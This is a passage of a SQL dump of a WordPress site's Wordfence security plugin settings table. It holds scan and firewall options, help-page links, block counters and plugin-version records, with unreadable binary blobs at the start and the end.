]*Ke7\rʄ5ҥGKP)ZlCٚ\rue\"dæe2/\rd2ev22@l;2}q>roT!3L&_N61eo+ 2u2#<Vvn̴+3;!33\'H0Yz]vhJ0AOf_/_ˎ\'e2W)2[Q2ޏ2Wn[9W-T7/y ;ů|ZO|352ɲ@bY|\\X͏dSeh+Q+HGYk*\"Rvm^ٵeȦ<Y䈁,:,:,(%ݚ|,\r~&Kl˒ԣd)e;,\r,Yֻ]!Y.2LW#e<dųBYHVIV:%+)\\({KV$,\\jKd=lnreNŲ?rY;gdz2d/=^5^eeoY6kFYeY;)dz7z1eU\0\"L6I6&}֔}[̓MUȦiWduYXlÔEknD雲?òb_\r ɐd{e(?CMWp7;dNF+#>U/dp͢FFÒdtz8CZ#c+c18;d@Q(pjde\"k[ULQ&J/ʔ\rejtmٿ|3ٿ;rA|G`||MN|\\nuwɵdrA\\\\|q4Lc|`|\\wPMn#,߿n\0<VnG[n=Wn/7<+7~Gn֝-?l\"\\;+,2[\'o?#?~[~6MP\\@lQ?˝N4ȝF^OjOH=7=\n&f><χPr&r_gYX\\ȗ+TxF C_)IGjon<a ԓTqE:<gAJ$\'S~?@SۣyIpyK<oD^,/GKK+ҡ!y:OȳY8Ik!YZPy_Um\nYX ױ oem.v׃fyC);+;nYAZaI}||S>*!Ǣc?/ɿOlO˿ȧRgGgnȿuݑASb	\\ה*^ Tɡemr褳$J1r~p^zC_cw1XwДlR&\'ѳ\0;9u&gN3l<9Z29/맜a7œ\"HT,	5\'Kw˗DJ|vBC20XY6Uo>P?XqB8DabDicbK-XK}H-b\"I36S0M{U,]絧}D/obߧ\nNKH{TaHaQ=ܧ=械ߴpRp)pRp5Vx7+<9C^>\n/?mp¯Cﭦ*^sTy@<SnU};g)΋r).G*B+SbEx2VqcJqe(Xq\"nFq\"v@7lRYqrv\"q@t\"\"EUH>Td\0)R~T̄*r34ˊk]QIWQn()*G^CJ\"Eefuꨨnx󮢱^K챢l⥎UMk3׍-${o[E[t3?N蚹ިpW#S*>+(jl)btbl}dزbyիwV=\0T\0\Z\n\Zb@R O)PKx\n6a\n\"篂**)k|~Fg*]kV\nB;PޥPR(f3j\0Ŋ7J#MRP\\u%^jT+w+]t^Da\\czN3NSSأ\\5Ԣ?UW5+uՕ=+7QnnPnLVnJWv\\ոrTOv_OJCrK>-rrߵ*8 \r<ȉVTQTS*;tRZVZ(mΚ+N*cvE}U(#Nl-P:Sݕ.Tk/\r\\選rئBPl\\<$V~}RyM\'<+pWԅ*`z9tʋ\rʰAGW[_(#+\no)K)ofS(oT*\ro)K+5t)y221[mVemRw*ߤ(Z)KW(K}ʚ\'5,oovڕ|e퇲NT>ݩ|{M蠲!WHR>8|~G\"gV|6U_}TOnЭlWvR݉iʾȫʏeBr?TUYQ\Z##p-_%r\"kr2D~UNӔluWk))3sm-.J\0J	WBn)aKJ8UܥP\"[(Jq%앒$\nPm*)&Ԑ%\\ɜu*hC)OXr!bq\Zx >EC+rJi4.8\\CK\"B	NIIHT$\r%PT$RtҥzѠPznng@(%虳zCQe軣@(hP-/ˠygZ`|WA;=]Лz,~_R\r`F]Q}rp`<=۹`c$L5i%\'a50c\'Nyf`1Xt:eX\0]ym-=v`k0e,P+G,}4\nnu\\*en1_<﯁R^`tY|d;iC}gF}?=6&q:lUD6uNm9>qaot*xB D\'Bo@H*84JLpDg?9eD;A_eS}b,ؽ\rqVBEwU8b$N2$HRggP#87k=}.Az\\H_<2lKw2o~\\\nWՕpͰnV@T;p37Idc.=}\nBQX)<MG\njP|<<q_=yTCx\'\Z;~Ibp\\\0UGW_+\'x}F@Q&4jBh_@p2M2|w:[Ows|z3*`v֚aOYJ\ntB\r{.>Nި|\ZU~t/;΢8`\'/Aq!vQ{P#7WhpGeq8ƬtGKGJ>kU	/\"pb\Z/Vt)$MI6NiW4ph\rQ4[,`Q9CWh~Z\\-)Z^|izh2F2*C;l/:pK9.\rU!i=tz:WMDwQ\Z=\\G8=ߏC/Kw5zrBV\\7L\n5?{gMCߜz߃~I1@?nL@+9nx[bq_wp5{o{m^44_p?3x0\Zr6%x8ãNvq0[w\n}#y&<$Cɚ0?`=1c[/5eW+̲YSzK=f`Nbo읆7{oM?ǻ5e{e%j,BXd\\\n|şI?G,\\eϻ㳄h|	\r\n`5+kcո]ҿ_VX]\rk<W`Iob]5?N3n`Ky~Vٌ\rFI~dw~H3\0t${ȓI4?n.}r\\E=3Iig5˔zB}:H9/TPi@ѤMҠqir\\[B5\"i]J!H{Y霉a]7аwIo	=n&dL!/Ȱv>\rL%40M*J)\'iʢd^J&$hځ{4|+M7/d溚dnLH\r&d9͐mE}S9,%6GBBEF9ϥ%\Zts-M;L˜ywtsU\\Z@ՎeyŇeZgN>䛹|O%?05;6XPږ@}ӂhڇ(?K|Xc:M\'P52:H3/PTk\\	tjd+7(n1JP$JPkEl(Bg>J-Ԇ:?b)Q5S1o{A]J<(kv\"]u@^ 6Lv~B9FGʝ|r[]274PTDzÅ:*J]ORg_*\r2s*\ZHeP-Fs=U;2uIGһL ?fPÔ(-oRs~hKmKj_ګOuUs@\\ًʆp];-X!rSYq?Φr=VgU.yɪ]GSVmVuXm~\'eA}<љАJYpuM`<ڄeO``56#Va<x	#\r<[l̖x<a:O\'ڰd<Ý\')3٤L^3&i~ώW`M<[&b+,p{^0ZG;5t/_W˃?\rRmŮ&_ͫN]eyu-qِ=c&Bxe(ղ&{\'?bʾOoPf.@-\\~9]wmݣQq8~C8tq9ީO{pؚt˨6|s&ٕg#G_8ҹ#	c\r>QS?sLO>xO[ñ9VOo+pݕINMy(sy|qh}Ô8&_fk-|{Nѓw}||..(̅;\"ü(~ؖΏۺ\"pu.7IE\\Ѝ+^sa~i;n#fg\\Ńk5sN~S؅;n;m>rHn|Cp}4@?ֿ%MώY~^g3bگQP6]Q>Q\']jQ}!eWd5!Q䄋vhg}O\Z8Wt\"~XO)ݎ2줱*4$?C_Ā(EH<8(c*AƙdDjIˣdJLm6ފ5VQbuJSlU6Ķ־w]T)[dAHYxU8*%ʲԌeiL8ӫ4Y5tT#;WIɺ)	_+KY?{W4Lٺ3M(Jzi(;%X\'JzLҒvИ>rx\rkx+.WZ9D5?TPX-	+NH⑋XV()k^KJ`\'c%uFSi#$ӭHIsɪ\"Y%r6\'A\"$\'*Rr%ש@޺ɝR?T$R01J\n\'ΓBUyV*u\nq<EwIqMHIgy:J<$cʤ@I~yTx{HŶRY Uwe[BjޚKMZ=~B;NEMȓ9(\r{KۏО%.i|2 -fR+H_i>Gf͓gk{|ʷQ1]:HG\"nK\ZS MЧ$aͩfl?wZjȑ\0','no'),('manualScanType','onceDaily','yes'),('max404Crawlers','DISABLED','yes'),('max404Crawlers_action','throttle','yes'),('max404Humans','DISABLED','yes'),('max404Humans_action','throttle','yes'),('maxExecutionTime','0','yes'),('maxGlobalRequests','DISABLED','yes'),('maxGlobalRequests_action','throttle','yes'),('maxMem','256','yes'),('maxRequestsCrawlers','DISABLED','yes'),('maxRequestsCrawlers_action','throttle','yes'),('maxRequestsHumans','DISABLED','yes'),('maxRequestsHumans_action','throttle','yes'),('migration636_email_summary_excluded_directories','1','no'),('needsNewTour_blocking','0','yes'),('needsNewTour_dashboard','0','yes'),('needsNewTour_firewall','0','yes'),('needsNewTour_livetraffic','0','yes'),('needsNewTour_loginsecurity','0','yes'),('needsNewTour_scan','0','yes'),('needsUpgradeTour_blocking','0','yes'),('needsUpgradeTour_dashboard','0','yes'),('needsUpgradeTour_firewall','0','yes'),('needsUpgradeTour_livetraffic','0','yes'),('needsUpgradeTour_loginsecurity','0','yes'),('needsUpgradeTour_scan','0','yes'),('neverBlockBG','neverBlockVerified','yes'),('noc1ScanSchedule','a:3:{i:0;i:1567066200;i:1;i:1567325400;i:2;i:1567584600;}','yes'),('notification_blogHighlights','1','yes'),('notification_productUpdates','1','yes'),('notification_promotions','1','yes'),('notification_scanStatus','1','yes'),('notification_securityAlerts','1','yes'),('notification_updatesNeeded','1','yes'),('onboardingAttempt1','license','yes'),('onboardingAttempt2','','no'),('onboardingAttempt3','','no'),('onboardingAttempt3Initial','0','yes'),('originalScheduledScanStart','1566807000','yes'),('other_blockBadPOST','0','yes'),('other_bypassLitespeedNoabort','0','yes'),('other_hideWPVersion','0','yes'),('other_pwStrengthOnUpdate','1','yes'),('other_scanComments','1','yes'),('other_scanOutside','0','yes'),('other_WFNet','1','yes'),('previousWflogsFileList','[\"GeoLite2-Country.mmdb\",\"template.php\",\"attack-data.php\",\"config-transient.php\",\"rules.php\",\"config-synced.php\",\"ips.php\",\"config-livewaf.php\",\".htaccess\",\"config.php\"]','yes'),('scanFileProcessing','','yes'),('scansEnabled_checkGSB','1','yes'),('scansEnabled_checkHowGetIPs','1','yes'),('scansEnabled_checkReadableConfig','1','yes'),('scansEnabled_comments','1','yes'),('scansEnabled_core','1','yes'),('scansEnabled_coreUnknown','1','yes'),('scansEnabled_diskSpace','1','yes'),('scansEnabled_dns','1','yes'),('scansEnabled_fileContents','1','yes'),('scansEnabled_fileContentsGSB','1','yes'),('scansEnabled_geoipSupport','1','yes'),('scansEnabled_highSense','0','yes'),('scansEnabled_malware','1','yes'),('scansEnabled_oldVersions','1','yes'),('scansEnabled_options','1','yes'),('scansEnabled_passwds','1','yes'),('scansEnabled_plugins','0','yes'),('scansEnabled_posts','1','yes'),('scansEnabled_scanImages','0','yes'),('scansEnabled_suspectedFiles','1','yes'),('scansEnabled_suspiciousAdminUsers','1','yes'),('scansEnabled_suspiciousOptions','1','yes'),('scansEnabled_themes','0','yes'),('scansEnabled_wafStatus','1','yes'),('scansEnabled_wpscan_directoryListingEnabled','1','yes'),('scansEnabled_wpscan_fullPathDisclosure','1','yes'),('scanStageStatuses','a:11:{s:13:\"spamvertising\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:4:\"spam\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:9:\"blacklist\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:6:\"server\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:5;s:8:\"finished\";i:5;s:8:\"expected\";i:5;}s:7:\"changes\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:6:\"public\";a:4:{s:6:\"status\";s:7:\"running\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:2;}s:7:\"malware\";a:4:{s:6:\"status\";s:7:\"running\";s:7:\"started\";i:2;s:8:\"finished\";i:1;s:8:\"expected\";i:2;}s:7:\"content\";a:4:{s:6:\"status\";s:7:\"running\";s:7:\"started\";i:1;s:8:\"finished\";i:0;s:8:\"expected\";i:3;}s:8:\"password\";a:4:{s:6:\"status\";s:7:\"pending\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:1;}s:13:\"vulnerability\";a:4:{s:6:\"status\";s:7:\"pending\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:1;}s:7:\"options\";a:4:{s:6:\"status\";s:7:\"pending\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:2;}}','no'),('scanTime','1567012426.9198','yes'),('scanType','standard','yes'),('scan_exclude','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Client.php','yes'),('scan_include_extra','','yes'),('scan_maxDuration','','yes'),('scan_maxIssues','1000','yes'),('schedMode','auto','yes'),('schedStartHour','7','yes'),('scheduledScansEnabled','1','yes'),('serverDNS','1567043633;666;199.250.217.134','yes'),('serverIP','1566903553;199.250.217.130','yes'),('showAdminBarMenu','1','yes'),('showWfCentralUI','1','yes'),('signatureUpdateTime','1566428995','yes'),('spamvertizeCheck','1','yes'),('ssl_verify','1','yes'),('startScansRemotely','0','yes'),('supportContent','{\"top\":[{\"title\":\"I am locked out of my site\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/#i-am-locked-out-of-my-site\",\"order\":0},{\"title\":\"Wordfence 7\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/wordfence-7\\/\",\"order\":1},{\"title\":\"Wordfence Web Application Firewall (WAF)\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"order\":2},{\"title\":\"Scan Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3},{\"title\":\"Optimizing The Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":4},{\"title\":\"Scan Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":5},{\"title\":\"PHP Fatal error: Failed opening required wordfence-waf.php\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php\",\"order\":6}],\"all\":[{\"title\":\"Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/\",\"excerpt\":\"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.\",\"children\":[{\"title\":\"Using the Settings page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/\",\"order\":0},{\"title\":\"Connecting your sites to Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/\",\"order\":1},{\"title\":\"Setting up two-factor authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/\",\"order\":2},{\"title\":\"Using the Dashboard page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/\",\"order\":3},{\"title\":\"Viewing scan Findings\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/\",\"order\":4},{\"title\":\"Using the Configuration page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/\",\"order\":5},{\"title\":\"Using Wordfence plugin options Templates\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/\",\"order\":6}],\"order\":0},{\"title\":\"Dashboard\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/\",\"excerpt\":\"The Wordfence Dashboard provides insight into the current state of your site’s security.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/\",\"order\":0},{\"title\":\"Alerts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/\",\"order\":1}],\"order\":1},{\"title\":\"Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"excerpt\":\"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. \",\"children\":[{\"title\":\"Optimizing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":0},{\"title\":\"Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":1},{\"title\":\"Statistics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/\",\"order\":2},{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/\",\"order\":3},{\"title\":\"MySQLi storage engine\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/\",\"order\":4},{\"title\":\"Brute Force Protection\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/\",\"order\":5},{\"title\":\"Rate Limiting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/\",\"order\":7}],\"order\":2},{\"title\":\"Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/\",\"excerpt\":\"Aside from the Firewall rules that protect against SQL-injection, XSS and more, Wordfence also has custom features for additional blocking. \",\"children\":[{\"title\":\"Blocked or Locked Out\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/blocked-or-locked-out\\/\",\"order\":0},{\"title\":\"Country Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/\",\"order\":1},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":2}],\"order\":3},{\"title\":\"Scan\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/\",\"excerpt\":\"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, shells that hackers have installed, known malicious URLs and known patterns of infections.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/\",\"order\":0},{\"title\":\"Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":1},{\"title\":\"Scheduling\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/\",\"order\":2},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3}],\"order\":4},{\"title\":\"Tools\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/\",\"excerpt\":\"Wordfence Tools include Two Factor Authentication, Whois Lookup, Password Audit, Live Traffic and Diagnostics.\",\"children\":[{\"title\":\"Import\\/Export\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/\",\"order\":0},{\"title\":\"Password Auditing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/password-auditing\\/\",\"order\":1},{\"title\":\"Whois Lookup\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/\",\"order\":2},{\"title\":\"Diagnostics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/\",\"order\":3},{\"title\":\"Live Traffic\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Legacy Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/\",\"order\":6}],\"order\":5},{\"title\":\"Login Security\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/\",\"excerpt\":\"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.\",\"order\":6},{\"title\":\"Advanced\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/\",\"excerpt\":\"If you want to know more about the technical details of Wordfence, you\'ll find the answers in this section.\",\"children\":[{\"title\":\"System requirements\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/\",\"order\":0},{\"title\":\"Changelog\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/\",\"order\":1},{\"title\":\"Remove or Reset\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/\",\"order\":2},{\"title\":\"Technical Details\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/\",\"order\":3},{\"title\":\"Constants\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/\",\"order\":4},{\"title\":\"Wordfence API\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/\",\"order\":5},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/\",\"order\":6}],\"order\":7},{\"title\":\"Wordfence Premium\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/\",\"excerpt\":\"Wordfence Premium comes with an IP Blacklist, Real Time Protection and much more.\",\"children\":[{\"title\":\"Account\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/account\\/\",\"order\":0},{\"title\":\"Pricing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/pricing\\/\",\"order\":1},{\"title\":\"License Key\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/api-key\\/\",\"order\":2}],\"order\":8},{\"title\":\"Wordfence and GDPR - General Data Protection Regulation\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/\",\"excerpt\":\"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available a data processing agreement to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services. We also provide a data processing agreement if you qualify as a data controller under the GDPR.\",\"order\":9},{\"title\":\"Site Cleaning and Security Audits\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/security-services\\/\",\"excerpt\":\"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.\",\"order\":10},{\"title\":\"Login Security Plugin\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/\",\"excerpt\":\"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either can’t or don’t want to run the full Wordfence plugin.\",\"order\":11}]}','yes'),('supportHash','e21a4a06da746c92b2f8cce2e3894a08d734bb4a715c9efef0a131da53cf1d86','yes'),('timeoffset_wf','0','yes'),('timeoffset_wf_updated','1567012421','yes'),('total503s','1008','yes'),('totalAlertsSent','103','yes'),('totalIPsBlocked','1008','yes'),('totalIPsLocked','5','yes'),('totalLoginHits','5432','yes'),('totalLogins','100','yes'),('totalScansRun','186','yes'),('touppBypassNextCheck','0','yes'),('touppPromptNeeded','','yes'),('vulnerabilities_plugin','a:26:{i:0;a:5:{s:4:\"slug\";s:9:\"cartflows\";s:9:\"toVersion\";s:5:\"1.2.6\";s:11:\"fromVersion\";s:5:\"1.2.5\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:1;a:5:{s:4:\"slug\";s:28:\"woo-gutenberg-products-block\";s:9:\"toVersion\";s:5:\"2.3.1\";s:11:\"fromVersion\";s:5:\"2.3.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:2;a:4:{s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:11:\"fromVersion\";s:3:\"7.5\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:3;a:4:{s:4:\"slug\";s:19:\"all-in-one-seo-pack\";s:11:\"fromVersion\";s:5:\"3.2.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:4;a:4:{s:4:\"slug\";s:31:\"autocomplete-woocommerce-orders\";s:11:\"fromVersion\";s:5:\"1.1.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:5;a:4:{s:4:\"slug\";s:13:\"code-snippets\";s:11:\"fromVersion\";s:6:\"2.13.3\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:6;a:4:{s:4:\"slug\";s:11:\"coming-soon\";s:11:\"fromVersion\";s:6:\"5.0.26\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:7;a:4:{s:4:\"slug\";s:46:\"yikes-inc-easy-custom-woocommerce-product-tabs\";s:11:\"fromVersion\";s:6:\"1.6.10\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:8;a:4:{s:4:\"slug\";s:29:\"es-woocommerce-activecampaign\";s:11:\"fromVersion\";s:6:\"1.9.11\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:9;a:4:{s:4:\"slug\";s:49:\"finale-woocommerce-sales-countdown-timer-discount\";s:11:\"fromVersion\";s:6:\"2.10.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:10;a:4:{s:4:\"slug\";s:24:\"google-sitemap-generator\";s:11:\"fromVersion\";s:5:\"4.1.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:11;a:4:{s:4:\"slug\";s:10:\"hurrytimer\";s:11:\"fromVersion\";s:5:\"2.2.8\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:12;a:4:{s:4:\"slug\";s:16:\"rocket-lazy-load\";s:11:\"fromVersion\";s:5:\"2.2.3\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:13;a:4:{s:4:\"slug\";s:23:\"official-facebook-pixel\";s:11:\"fromVersion\";s:6:\"1.7.25\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:14;a:4:{s:4:\"slug\";s:17:\"really-simple-ssl\";s:11:\"fromVersion\";s:5:\"3.2.5\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:15;a:4:{s:4:\"slug\";s:26:\"shortpixel-adaptive-images\";s:11:\"fromVersion\";s:5:\"1.2.5\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:16;a:4:{s:4:\"slug\";s:17:\"woocommerce-admin\";s:11:\"fromVersion\";s:6:\"0.17.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:17;a:4:{s:4:\"slug\";s:29:\"woo-cart-abandonment-recovery\";s:11:\"fromVersion\";s:5:\"1.1.7\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:18;a:4:{s:4:\"slug\";s:40:\"woocommerce-google-analytics-integration\";s:11:\"fromVersion\";s:6:\"1.4.12\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:19;a:4:{s:4:\"slug\";s:27:\"woocommerce-payfast-gateway\";s:11:\"fromVersion\";s:6:\"1.4.13\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:20;a:4:{s:4:\"slug\";s:24:\"woocommerce-pdf-invoices\";s:11:\"fromVersion\";s:5:\"3.0.7\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:21;a:4:{s:4:\"slug\";s:9:\"wordfence\";s:11:\"fromVersion\";s:5:\"7.4.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:22;a:4:{s:4:\"slug\";s:11:\"wp-optimize\";s:11:\"fromVersion\";s:6:\"3.0.11\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:23;a:4:{s:4:\"slug\";s:43:\"all-in-one-wp-migration-unlimited-extension\";s:11:\"fromVersion\";s:4:\"2.31\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:24;a:4:{s:4:\"slug\";s:5:\"bloom\";s:11:\"fromVersion\";s:6:\"1.3.10\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:25;a:4:{s:4:\"slug\";s:13:\"cartflows-pro\";s:11:\"fromVersion\";s:5:\"1.2.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}}','yes'),('vulnerabilities_theme','a:1:{i:0;a:4:{s:4:\"slug\";s:4:\"Divi\";s:9:\"toVersion\";s:6:\"3.27.3\";s:11:\"fromVersion\";s:6:\"3.26.6\";s:10:\"vulnerable\";b:0;}}','yes'),('wafAlertInterval','600','yes'),('wafAlertOnAttacks','1','yes'),('wafAlertThreshold','100','yes'),('wafAlertWhitelist','','yes'),('waf_status','enabled','yes'),('wfKillRequested','0','no'),('wfPeakMemory','63176704','no'),('wfScanStartVersion','5.2.2','yes');
INSERT INTO `wpxb_wfconfig` VALUES ('wfsd_engine','\0\0\0\0\0\0zhv\'KQrUa_\\UqQjkvɰ\0IH$A$yLLd$=tL,=yﻁ|8Uo{\0y˙$u^4vMm:]{ؿówf\"Oe{9[_w`}	o#6]u\rZp;w8RC_6k}gm-|FoHzO pUL]D꘺ׅ;/QCJ*|!%ӆ/1|\ZXŨ\\ܹcZ\\oά۶lwnh8ja\nSPtܾ_:Nw\'7lo@egQ̾uGų}27>1evhm\'gl<z}y5DZN~?0~q6ǲ,}W׾ea|c@\Z~/quxu=J+zx|ak۞o E<y4F23{s}ɗYْ%j)֐\rEVJ$,ް,T3N^i*UTIU\"\rIejfCES6몦Y&/m&OH$KPgV*hu7z]/<]j^thʲƱ\"nL2d.m3ފ@^v,%ώہ|gxV/\\j]ލC \'%Fv|t	݁gE\Zxl3+gcFFx YhކQ\nN<G:d/rrWky<jbwo3{B&E}]F,c2R+n\nyJ~+8BNW^<;bn:	VxPk\\|\0;\ZjcA!\r?\r{%VedAU!fln4#-\"	!YDD`PRx4%\\C{ȝ.^vwF.>,a\r]pOK>a=ϸr6Jdх9JtiӾtth7=:}>sD~r(d+3ۋ3Vg,a<k^0~F{MLM3nwƘǷ;;H>)C|gt iȼOH#pA?{\"F8d\n\"ɚoC\ng]Ã6^x?3`w Of51.tëΐl^9g۞t\0fiu{>SSąS\'H`yy8EJp@X pjuߨ;mtG0w)ft1a\"赜3<Ϯ2pV@q}לvm13é!3PwV>	1FHoNJ\r	*dq|z-bDW+_gM/|!ޠQ<@)zTI\rw.x20|Eۘlъb`1lh1h$~s5V\\	